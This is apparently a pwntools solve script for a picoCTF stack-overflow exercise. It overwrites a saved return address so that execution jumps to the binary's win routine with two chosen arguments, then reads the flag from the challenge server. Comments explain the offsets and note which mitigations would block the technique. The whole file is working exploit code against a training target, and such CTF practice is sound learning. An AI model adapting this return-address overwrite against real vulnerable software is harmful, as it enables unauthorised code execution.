
#!/usr/bin/env python
from pwn import *
# Solve script for a picoCTF binary-exploitation exercise: one line of input
# overruns a stack buffer so that the saved return address points at the
# binary's win routine, with two argument words placed where that routine
# will look for them.
#
# NOTE(review): win_address is a hard-coded code address and nothing here leaks
# or preserves a stack canary, so this presumably only works against a build
# without PIE and without stack protection -- confirm against the challenge
# binary. Those two mitigations are what stop this class of overwrite.

# Terminal emulator pwntools uses when it has to open a debugger window.
context.terminal = "kitty"

# Destination of the overwritten return address and the two argument values.
win_address = 0x08049296
arg1 = 0xCAFEF00D
arg2 = 0xF00DF00D

# Addresses of the buffer start and of the saved return address (presumably
# read off a local debugging session); only their distance is used.
buffer_base = 0xfffe422c
ret_location = 0xfffe429c
ret_offset = ret_location - buffer_base  # 0x70 == 112 bytes

# Same value as ret_offset. The arguments go 8 and 12 bytes past it, which
# leaves one filler word between the return slot and the first argument.
ebp_offset = 112

# The port is specific to one challenge instance and will need updating.
conn = remote("saturn.picoctf.net", 56706)
# Local alternatives kept from the original for debugging:
#conn = process("./vuln")
#attach(conn)

# Consume the first line the service prints before sending anything.
conn.recvline()

# flat() fills every gap between the listed offsets with generated padding
# and packs each value as a 32-bit word.
layout = {
    ebp_offset + 0x8: arg1,
    ebp_offset + 0xc: arg2,
    ret_offset: win_address,
}
payload = flat(layout, word_size=32)
conn.sendline(payload)

# Skip the next line of output, then read up to the closing brace of the flag.
conn.recvline()
rest = conn.recvuntil(b'}')
log.info(f"got {rest}")